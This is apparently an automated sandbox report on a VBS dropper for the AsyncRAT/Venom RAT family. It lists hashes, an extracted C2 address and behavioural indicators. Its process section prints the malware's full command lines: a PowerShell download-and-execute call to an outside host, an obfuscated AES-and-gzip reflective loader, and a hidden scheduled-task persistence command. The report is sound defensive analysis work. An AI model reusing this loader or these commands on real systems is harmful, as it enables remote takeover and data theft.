Analysis
  max time kernel: 94s
  max time network: 148s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 18-12-2024 02:36

Static task: static1

Behavioral task: behavioral1
  Sample: 6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs
  Resource: win7-20240729-en
General
  Target: 6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs
  Size: 66KB
  MD5: db10d2a27be78c780e5757b46a265e6d
  SHA1: 36f720617c0f2eb5fd700dc06714fb069dea7eb9
  SHA256: 6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d
  SHA512: 58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7
  SSDEEP: 1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8

Malware Config
  Extracted: asyncrat
    Venom RAT + HVNC + Stealer + Grabber v6.0.3
    Dec2024
    45.88.88.7:6845
    zmkdvkzgwmnzhgvxwwk
    delay: 1
    install: false
    install_folder: %AppData%
Signatures

Asyncrat family

Async RAT payload (1 IoCs)
  resource                                                                      yara_rule
  behavioral2/memory/4416-65-0x000001CD26480000-0x000001CD26498000-memory.dmp  family_asyncrat

Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  38    4416  powershell.exe

(signature name missing from the page)
  pid   Process
  264   powershell.exe
  3344  powershell.exe
  4568  powershell.exe
  4416  powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation  WScript.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoCs)
  description  ioc                                                                               Process
  Key created  \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings  powershell.exe

Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid   Process
  264   powershell.exe
  264   powershell.exe
  3344  powershell.exe
  3344  powershell.exe
  4568  powershell.exe
  4568  powershell.exe
  4416  powershell.exe
  4416  powershell.exe
  4416  powershell.exe
  4416  powershell.exe
  4416  powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  264   powershell.exe
  Token: SeDebugPrivilege  3344  powershell.exe
  Token: SeDebugPrivilege  4568  powershell.exe
  The remaining 61 entries are all for pid 4568 (powershell.exe) and repeat the following sequence of 21 tokens three times, the third pass ending at token 34:
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  4416  powershell.exe

Suspicious use of WriteProcessMemory (16 IoCs)
  Each of the following entries is recorded twice in the report.
  description                        pid   Process         procid_target
  PID 3084 wrote to memory of 2836   3084  WScript.exe     82
  PID 2836 wrote to memory of 264    2836  cmd.exe         84
  PID 3084 wrote to memory of 1740   3084  WScript.exe     94
  PID 1740 wrote to memory of 3344   1740  cmd.exe         96
  PID 3344 wrote to memory of 4568   3344  powershell.exe  97
  PID 3344 wrote to memory of 1164   3344  powershell.exe  99
  PID 1164 wrote to memory of 4364   1164  WScript.exe     100
  PID 4364 wrote to memory of 4416   4364  cmd.exe         102
Processes

C:\Windows\System32\WScript.exe  (PID 3084)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 2836)
    Command line: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 264)
      Command line: powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe  (PID 1740)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3344)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4568)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr14_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WScript.exe  (PID 1164)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_14.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe  (PID 4364)
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_14.bat" "
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4416)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Roaming\inicia_str_14.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads